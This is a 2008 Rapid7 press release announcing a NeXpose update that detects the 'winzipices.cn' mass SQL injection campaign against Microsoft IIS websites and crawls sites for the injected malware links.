Rapid7 Announces Critical Vulnerability Check for Automated SQL Injection

Rapid7 NeXpose update includes SQL Injection Check and Web Crawling capabilities for “winzipices.cn” vulnerability – responsible for exploiting over 500,000 servers

BOSTON - May 13, 2008 - Rapid7 the leading provider of Unified Vulnerability Management (UVM) solutions for large enterprise deployments and small to medium businesses, announced today NeXpose includes a check and web crawl ability to detect and remediate the winzipices.cn vulnerability. Web sites hit by this SQL injection attack have their web page contents modified to point to malware that is automatically downloaded by any visitor to the site. These sites are all vulnerable to SQL injection (or have recently been vulnerable) and were hacked by this automated hacker toolkit. In addition, by executing a Google search on the malware name, hackers can find sites that have been already been exploited.

The winzipices.cn SQL injection attack aimed at Microsoft IIS web servers has hit over 500,000 websites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security. To date, the attack continues to evolve and automatically affect new servers. The automated attack takes advantage of the fact that Microsoft’s IIS servers allow generic commands that don’t require specific table-level arguments. The vulnerability is the result of poor data handling by the sites' creators, rather than a specific Microsoft flaw. The attack itself injects malicious JavaScript code into every text field in the database, the JavaScript then loads an external script that can compromise a user’s PC.

According to Microsoft, there is no patch to fix the issue; the problem is with the developers who failed to follow well-established security practices for handling database input. Also, if your site has been affected, you’re going to need to restore your database from a clean backup copy and start reviewing your code to make sure all input is properly sanitized. To accomplish this, companies need to scan for the vulnerability.

The latest NeXpose update provides both a check to help locate the SQL Injection vulnerability and the ability to crawl web sites to locate if the site has been exploited. By crawling the website, companies can use NeXpose to identify and remove any malware injected by the attack. Leaving the exploit unnoticed and unfixed allows even the most junior hacker, to find and exploit the corrupted site. Finding exploited web site is as easy as executing a Google search for the malware name. Every web site that is affected will be listed in the Google search.

"This is a critical security issue for all companies using Microsoft IIS. Once an attacker has access to the underlying database via SQL injection, it is often possible for an attacker to escalate his privileges and attack the underlying operating system that hosts the database. These vulnerabilities opens the door for hackers to easily access corporate networks and customer data,” stated Tas Giakouminakis, CTO of Rapid7. "Because this is an automated SQL injection attack, the list of exploits will continue to grow. We expect the automated attack to continue to evolve and for more servers to be targeted in the coming weeks."

About Rapid7

Rapid7 is the leading provider of Unified Vulnerability Management (UVM) Solutions. Rapid7’s NeXpose UVM provides network, database and Web application vulnerability management for enterprise deployments and small-to-medium businesses. Since its introduction, NeXpose has been sold to corporate enterprises, Global 2000 companies, and government entities, and serves the full range of vertical markets across the U.S. and abroad. In addition, Rapid7 provides compliance products and services for PCI, HIPAA and Sarbanes Oxley. Rapid7 is headquartered in Boston, MA, with an office in Los Angeles, California.